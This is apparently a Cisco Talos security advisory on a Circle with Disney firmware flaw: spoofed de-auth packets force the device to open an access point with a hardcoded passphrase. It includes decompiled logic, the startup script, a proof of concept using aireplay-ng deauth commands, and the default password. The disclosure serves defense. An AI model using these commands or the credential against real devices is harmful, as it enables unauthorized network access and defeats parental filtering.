An exploitable vulnerability exists in the WiFi Access Point feature of Circle with Disney running firmware 2.0.1. A series of WiFi packets can force Circle to setup an Access Point with default credentials. An attacker needs to send a series of spoofed “de-auth” packets to trigger this vulnerability.
Circle with Disney 2.0.1
6.5 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-284: Improper Access Control
Circle with Disney is a network device used to monitor internet use of children on a given network.
Circle can connect to a home network either via WiFi or wired connection. When no cable connection is possible, Circle will switch to WiFi, which was set-up during the initial configuration.
When connected via WiFi, the
main function in the
configd binary continuously checks for network connectivity by calling
This function verifies that the interface is associated with the Access Point and that it has an IP address assigned. If any of these checks aren’t satisfied, the return value will be 0, meaning there’s no available connection.
Back in the
main function, when there’s no connection, function
sub_40A2A0 will be called with argument “Internet connection down”. At high level, the function works as follows:
def circle_ap(status): print "setting Wifi Status to %s" % status if status == "paired": system("circle_ap.sh down 30 &") else system("circle_ap.sh up &") # 
At  the
circle_ap.sh script is called to start an Access Point.
Contents of the script are the following:
#!/bin/sh CIRCLE_ROOT=`cat /tmp/CIRCLE_ROOT` case $# in 2) sleep $2 ;; esac case "$1" in up) ps | grep [h]ostapd && ifconfig ra0 | grep UP && exit 0 killall hostapd; ifconfig eth0 0.0.0.0 ifconfig ra0 10.123.234.1 netmask 255.255.255.0 up hostapd -B /tmp/hostapd.conf #  $CIRCLE_ROOT/scripts/refresh_hosts.sh ap ;; down) killall hostapd; ifconfig ra0 10.123.234.1 netmask 255.255.255.0 down; ;; *) echo -n "usage: circle_ap <up/down> <optional delay>" exit 1 esac exit 0
hostapd is used to bring up an Access Point using the configuration below.
# grep -e ssid -e wpa /tmp/hostapd.conf ssid=Circle-1234 wpa=3 wpa_passphrase=mycircle wpa_key_mgmt=WPA-PSK wpa_pairwise=TKIP CCMP wpa_group_rekey=600
The SSID used is “Circle-“ prefixed with the last two hex digits of the MAC address. The “wpa_passphrase” parameter is fixed.
Indeed, the base
hostapd.conf file is copied from
/mnt/shares/usr/bin/scripts/hostapd.conf during boot time by the script
startcircle. The only modification applied is the SSID name.
This feature allows an attacker to connect to a Circle Access Point, after forcing it out of its legitimate WiFi network. The device will continue to function but won’t be able to apply any filtering over the original network, moreover this allows an attacker to conduct further attacks against the device that may be possible only on a common subnetwork.
As an example, this vulnerability would allow an external attacker to apply TALOS-2017-0396 and TALOS-2017-0371 to completely compromise the device.
The following proof of concept shows how to make the device disconnect from its legitimate WiFi network and to start its own Access Point, by sending a series of “deauth” packets.
$ airmon-ng start wlan0 1 $ aireplay-ng --deauth 10000 -a $WIFI_ROUTER_MAC -c $CIRCLE_MAC mon0
After a new Access Point is detected with name starting with “Circle-“ it’s possible to connect to it using the password “mycircle”.
2017-09-20 - Vendor Disclosure
2018-03-29 - Public Release
Discovered by Claudio Bozzato and Lilith Wyatt of Cisco Talos.